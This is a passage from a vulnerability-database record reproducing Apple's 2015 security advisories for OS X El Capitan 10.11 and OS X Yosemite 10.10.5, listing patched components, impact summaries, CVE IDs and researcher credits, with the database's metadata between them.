m00nbsd\r\nCVE-2015-5903 : CESG\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local process can modify other processes without\r\nentitlement checks\r\nDescription: An issue existed where root processes using the\r\nprocessor_set_tasks API were allowed to retrieve the task ports of\r\nother processes. This issue was addressed through additional\r\nentitlement checks.\r\nCVE-ID\r\nCVE-2015-5882 : Pedro Vilaca, working from original research by\r\nMing-chieh Pan and Sung-ting Tsai; Jonathan Levin\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker may control the value of stack cookies\r\nDescription: Multiple weaknesses existed in the generation of user\r\nspace stack cookies. These issues were addressed through improved\r\ngeneration of stack cookies.\r\nCVE-ID\r\nCVE-2013-3951 : Stefan Esser\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker may be able to launch denial of service attacks\r\non targeted TCP connections without knowing the correct sequence\r\nnumber\r\nDescription: An issue existed in xnu's validation of TCP packet\r\nheaders. This issue was addressed through improved TCP packet header\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5879 : Jonathan Looney\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker in a local LAN segment may disable IPv6 routing\r\nDescription: An insufficient validation issue existed in the\r\nhandling of IPv6 router advertisements that allowed an attacker to\r\nset the hop limit to an arbitrary value. This issue was addressed by\r\nenforcing a minimum hop limit.\r\nCVE-ID\r\nCVE-2015-5869 : Dennis Spindel Ljungmark\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to determine kernel memory layout\r\nDescription: An issue existed that led to the disclosure of kernel\r\nmemory layout. This was addressed through improved initialization of\r\nkernel memory structures.\r\nCVE-ID\r\nCVE-2015-5842 : beist of grayhash\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to determine kernel memory layout\r\nDescription: An issue existed in debugging interfaces that led to\r\nthe disclosure of memory content. This issue was addressed by\r\nsanitizing output from debugging interfaces.\r\nCVE-ID\r\nCVE-2015-5870 : Apple\r\n\r\nKernel\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A state management issue existed in debugging\r\nfunctionality. This issue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team\r\n\r\nlibc\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse\r\nCorporation\r\n\r\nlibpthread\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team\r\n\r\nlibxpc\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Many SSH connections could cause a denial of service\r\nDescription: launchd had no limit on the number of processes that\r\ncould be started by a network connection. This issue was addressed by\r\nlimiting the number of SSH processes to 40.\r\nCVE-ID\r\nCVE-2015-5881 : Apple\r\n\r\nLogin Window\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: The screen lock may not engage after the specified time\r\nperiod\r\nDescription: An issue existed with captured display locking. The\r\nissue was addressed through improved lock handling.\r\nCVE-ID\r\nCVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau\r\ninformationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni\r\nVaahtera, and an anonymous researcher\r\n\r\nlukemftpd\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A remote attacker may be able to deny service to the FTP\r\nserver\r\nDescription: A glob-processing issue existed in tnftpd. This issue\r\nwas addressed through improved glob validation.\r\nCVE-ID\r\nCVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com\r\n\r\nMail\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Printing an email may leak sensitive user information\r\nDescription: An issue existed in Mail which bypassed user\r\npreferences when printing an email. This issue was addressed through\r\nimproved user preference enforcement.\r\nCVE-ID\r\nCVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,\r\nDennis Klein from Eschenburg, Germany, Jeff Hammett of Systim\r\nTechnology Partners\r\n\r\nMail\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: An attacker in a privileged network position may be able to\r\nintercept attachments of S/MIME-encrypted e-mail sent via Mail Drop\r\nDescription: An issue existed in handling encryption parameters for\r\nlarge email attachments sent via Mail Drop. The issue is addressed by\r\nno longer offering Mail Drop when sending an encrypted e-mail.\r\nCVE-ID\r\nCVE-2015-5884 : John McCombs of Integrated Mapping Ltd\r\n\r\nMultipeer Connectivity\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker may be able to observe unprotected\r\nmultipeer data\r\nDescription: An issue existed in convenience initializer handling in\r\nwhich encryption could be actively downgraded to a non-encrypted\r\nsession. This issue was addressed by changing the convenience\r\ninitializer to require encryption.\r\nCVE-ID\r\nCVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem\r\n\r\nNetworkExtension\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An uninitialized memory issue in the kernel led to the\r\ndisclosure of kernel memory content. This issue was addressed through\r\nimproved memory initialization.\r\nCVE-ID\r\nCVE-2015-5831 : Maxime Villard of m00nbsd\r\n\r\nNotes\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to leak sensitive user information\r\nDescription: An issue existed in parsing links in the Notes\r\napplication. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher\r\n\r\nNotes\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to leak sensitive user information\r\nDescription: A cross-site scripting issue existed in parsing text by\r\nthe Notes application. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)\r\n\r\nOpenSSH\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in OpenSSH\r\nDescription: Multiple vulnerabilities existed in OpenSSH versions\r\nprior to 6.9. These issues were addressed by updating OpenSSH to\r\nversion 6.9.\r\nCVE-ID\r\nCVE-2014-2532\r\n\r\nOpenSSL\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in OpenSSL\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-0286\r\nCVE-2015-0287\r\n\r\nprocmail\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in procmail\r\nDescription: Multiple vulnerabilities existed in procmail versions\r\nprior to 3.22. These issues were addressed by removing procmail.\r\nCVE-ID\r\nCVE-2014-3618\r\n\r\nremote_cmds\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with root\r\nprivileges\r\nDescription: An issue existed in the usage of environment variables\r\nby the rsh binary. This issue was addressed by dropping setuid\r\nprivileges from the rsh binary.\r\nCVE-ID\r\nCVE-2015-5889 : Philip Pettersson\r\n\r\nremovefile\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Processing malicious data may lead to unexpected application\r\ntermination\r\nDescription: An overflow fault existed in the checkint division\r\nroutines. This issue was addressed with improved division routines.\r\nCVE-ID\r\nCVE-2015-5840 : an anonymous researcher\r\n\r\nRuby\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in Ruby\r\nDescription: Multiple vulnerabilities existed in Ruby versions prior\r\nto 2.0.0p645. These were addressed by updating Ruby to version\r\n2.0.0p645.\r\nCVE-ID\r\nCVE-2014-8080\r\nCVE-2014-8090\r\nCVE-2015-1855\r\n\r\nSecurity\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: The lock state of the keychain may be incorrectly displayed\r\nto the user\r\nDescription: A state management issue existed in the way keychain\r\nlock status was tracked. This issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,\r\nEric E. Lawrence, Apple\r\n\r\nSecurity\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A trust evaluation configured to require revocation checking\r\nmay succeed even if revocation checking fails\r\nDescription: The kSecRevocationRequirePositiveResponse flag was\r\nspecified but not implemented. This issue was addressed by\r\nimplementing the flag.\r\nCVE-ID\r\nCVE-2015-5894 : Hannes Oud of kWallet GmbH\r\n\r\nSecurity\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A remote server may prompt for a certificate before\r\nidentifying itself\r\nDescription: Secure Transport accepted the CertificateRequest\r\nmessage before the ServerKeyExchange message. This issue was\r\naddressed by requiring the ServerKeyExchange first.\r\nCVE-ID\r\nCVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine\r\nDelignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of\r\nINRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of\r\nMicrosoft Research, Pierre-Yves Strub of IMDEA Software Institute\r\n\r\nSMB\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5891 : Ilja van Sprundel of IOActive\r\n\r\nSMB\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local user may be able to determine kernel memory layout\r\nDescription: An issue existed in SMBClient that led to the\r\ndisclosure of kernel memory content. This issue was addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-5893 : Ilja van Sprundel of IOActive\r\n\r\nSQLite\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Multiple vulnerabilities in SQLite v3.8.5\r\nDescription: Multiple vulnerabilities existed in SQLite v3.8.5.\r\nThese issues were addressed by updating SQLite to version 3.8.10.2.\r\nCVE-ID\r\nCVE-2015-3414\r\nCVE-2015-3415\r\nCVE-2015-3416\r\n\r\nTelephony\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker can place phone calls without the user's\r\nknowledge when using Continuity\r\nDescription: An issue existed in the authorization checks for\r\nplacing phone calls. This issue was addressed through improved\r\nauthorization checks.\r\nCVE-ID\r\nCVE-2015-3785 : Dan Bastone of Gotham Digital Science\r\n\r\nTerminal\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Maliciously crafted text could mislead the user in Terminal\r\nDescription: Terminal did not handle bidirectional override\r\ncharacters in the same way when displaying text and when selecting\r\ntext. This issue was addressed by suppressing bidirectional override\r\ncharacters in Terminal.\r\nCVE-ID\r\nCVE-2015-5883 : an anonymous researcher\r\n\r\ntidy\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: Multiple memory corruption issues existed in tidy.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5522 : Fernando Munoz of NULLGroup.com\r\nCVE-2015-5523 : Fernando Munoz of NULLGroup.com\r\n\r\nTime Machine\r\nAvailable for: Mac OS X v10.6.8 and later\r\nImpact: A local attacker may gain access to keychain items\r\nDescription: An issue existed in backups by the Time Machine\r\nframework. This issue was addressed through improved coverage of Time\r\nMachine backups.\r\nCVE-ID\r\nCVE-2015-5854 : Jonas Magazinius of Assured AB\r\n\r\nNote: OS X El Capitan 10.11 includes the security content of\r\nSafari 9: https://support.apple.com/kb/HT205265.\r\n\r\nOS X El Capitan 10.11 may be obtained from the Mac App Store:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-10-05T00:00:00", "title": "APPLE-SA-2015-09-30-3 OS X El Capitan 10.11", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:01", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-3415", "CVE-2015-3330", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-5874", "CVE-2015-5860", "CVE-2015-1855", "CVE-2014-3618", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-5868", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-5873", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-5912", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5913", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5878", "CVE-2015-5855", "CVE-2014-8611", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-5824", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-3414", "CVE-2014-9652", "CVE-2015-5523", "CVE-2015-5885", "CVE-2013-3951", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-0287", "CVE-2015-5853", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-5914", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899"], "modified": "2015-10-05T00:00:00", "id": "SECURITYVULNS:DOC:32522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32522", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "references": [], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow 